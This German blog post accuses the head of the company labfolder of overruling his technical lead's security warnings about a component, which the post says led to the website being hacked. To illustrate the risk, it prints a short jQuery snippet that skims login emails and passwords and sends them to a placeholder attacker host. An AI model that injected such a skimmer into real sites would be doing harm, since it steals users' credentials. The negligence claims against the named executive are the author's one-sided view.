Inkompetenz hin oder her — was der Chef sagt muss gemacht werden — und dann wurde labfolder gehackt

Stellen wir uns jemanden als Technischen Leiter vor, der Ahnung von Technik hat. Er ist engagiert und setzt sich für das Unternehmen ein, in dem er arbeitet. Sein Chef kommt zu ihm und schlägt vor, zukünftig eine bestimmte technische Komponente zu nutzen. Falls diese neue technische Komponente nicht den Sicherheitsstandards im Unternehmen entspricht, dann könnte der Technische Leiter beispielsweise so antworten:

Diese technische Kompontent sollten wir nicht verwenden. Ich denke, es ist nicht geeignet um die Sicherheit für die Nutzerdaten zu gewährleisten.

Daraufhin könnte der Chef so reagieren:

OK Technischer Leiter. Du hast mehr IT-Kompetenz als ich. Wenn das nicht ausreichend sicher ist, dann machen wir das nicht. Sondern wir finden eine andere Lösung, die sicher genug ist.

Die Situation, wie gerade beschrieben, ist so bei labfolder passiert. Nur mit einem Unterschied. Der Chef, Simon Bungers, hat nicht gesagt: “OK Technischer Leiter, …”. Sondern der Chef bestand auf seiner Meinung, dass die neue technische Komponente verwendet werden soll. Der Technische Leiter hat eindringlich auf seinen Chef eingeredet, diese unsichere Komponente nicht zu nutzen. “Ich habe ihn bekniet”, meinte er. Aber auch das hat nichts genützt. Der Chef hatte entschieden. Was Herr Bungers sagt wird gemacht. Und kurze Zeit später wurde die neue technische Komponente im Unternehmen eingeführt — entgegen der klaren Aussage des Technischen Leiters. Und schließlich ist passiert, was passieren musste. Murphys Gesetz hat zugeschlagen:

Alles, was schiefgehen kann, wird auch schiefgehen.

Es gab einen Hacker-Angriff auf das labfolder System. Dabei konkret gegen die Komponente, die der Technische Leiter als unsicher eingestuft hat.

Der Chef Simon Bungers hat die Einwände des Technischen Leiters nicht ernst genommen. Und das, obwohl ihm bekannt war, dass der Technische Leiter aufgrund seiner Ausbildung und Berufserfahrung weitaus mehr Kompetenz im Bereich IT-Sicherheit vorweisen kann. Meiner Meinung ist dies ein gutes Praxis-Beispiel was fahrlässiges Handeln bedeutet. Im Bürgerlichen Gesetzbuch ist fahrlässiges Handeln in § 276 Abs. 2 so geregelt:

Fahrlässig handelt, wer die im Verkehr erforderliche Sorgfalt außer Acht lässt.

Wenn man Chef eines Unternehmens ist, dass sehr sensible Nutzerdaten verwaltet und die Bedenken seiner gutausgebildeten IT-Mitarbeiter ignoriert, dann ist beim besten Willen nicht mehr von erforderlicher Sorgfalt die Rede.

Wie schwerwiegend letztendlich das Eindringen der Hacker in das labfolder System war, zeigt folgende Aussage von Simon Bungers:

Aussage von labfolder Chef Simon Bungers

Nachdem sich Fremde Zugriff in das labfolder System verschafft hatten, konnten sie darin Daten manipulieren. Diese Aussage steht im ersten Absatz:

Malignant files have been created […]

Was aber noch viel besorgniserregender ist, zeigt sich im zweiten Absatz in der Aussage von Simon Bungers:

No risk was seen for the software […]

Simon Bungers geht also davon aus, dass kein Risiko für die Software bestand, welche die sensiblen Nutzerdaten verwaltet. Seiner Meinung ist das der Fall, weil die Software auf einem anderen Server/Infrastruktur läuft. Und die Webseite ist nur für das Einloggen und Registrieren der Nutzer zuständig.

Diese Aussage verdeutlicht, dass das technische Verständnis bei labfolder, oder hier in Person von Simon Bungers, ziemlich eingeschränkt ist.

Wenn die Hacker die Webseite manipulieren konnten, und die Webseite für das Einloggen (mit Benutzernamen und Passwort) zuständig ist, dann ist es doch offensichtlich, dass dies ein erhebliches Sicherheitsrisiko darstellt. Die Hacker können die Login-Funktion von labfolder so manipulieren, dass die von den Nutzern eingegebenen Passwörter mitgelesen werden. Anschließend werden alle abgegriffenen Passwörter direkt an die Hacker geschickt. Für Studierende im ersten Semester Informatik sollte dies nicht länger als fünf Minuten dauern. Das beinhaltet auch, die Veränderung an der Login-Funktion so vorzunehmen, dass die Nutzer beim Einloggen auf der labfolder Webseite nichts davon mitbekommen. Das hört sich nicht realisitsch an? Wie wäre es damit:

$(“#email, #password”).on(“change paste keyup”, function(e) { $(‘body’) .prepend(‘<img src=”https://evilwebsite42.com?email=' + $(“#email”).val() +’&password=’ + $(“#password”).val() + ‘ “ width=”1" height=”1" />’) })

Dieses kleine Stück Quellcode reicht vollkommen aus! Wenn labfolder mit diesem Stück Code infiziert ist, wird bei jedem Einloggen der Nutzername und das Passwort automatisch an eine andere Webseite geschickt. In diesem Beispiel wäre es evilwebsite42.com. Somit können Hacker die Nutzernamen und Passwörter von allen Nutzern abgreifen, die sich einloggen. Und wie schon oben erwähnt: der normale Nutzer bekommt davon absolut nichts mit. Die labfolder Webseite sieht aus wie immer und verhält sich auch wie immer. Nur im Hintergrund werden heimlich Nutzernamen und Passwörter an die Hacker geschickt.

Um diesen Hackerangriff und die Sicherheitslücke genauer zu analysieren, hat labfolder einen externen IT-Dienstleister beauftragt. Dessen Fazit lautet:

Fazit externer IT-Dienstleister

Der externe IT-Dienstleister bestätigt hier, dass zumindest eine der Sicherheitslücken im labfolder System “nachweisbar” ausgenutzt wurde. Weiterhin wird auch der urspüngliche Einwand des Technischen Leiters bestätigt, dass es berechtigte Bedenken bezüglich der Systemsicherheit gibt.

Es sollte geprüft werden, ob die Software joomla die funktionalen und sicherheitstechnischen Anforderungen erfüllt.

Die Geschäftsführung von labfolder hat in diesem Fall die Meinung des Mitarbeiters komplett ignoriert. Ein weiteres Beispiel, wie bei labfolder die Mitarbeiter behandelt werden, wird im nächsten Artikel beschrieben. Der Titel lautet: “labfolder bezahlt seine Mitarbeiter nicht wie vereinbart”.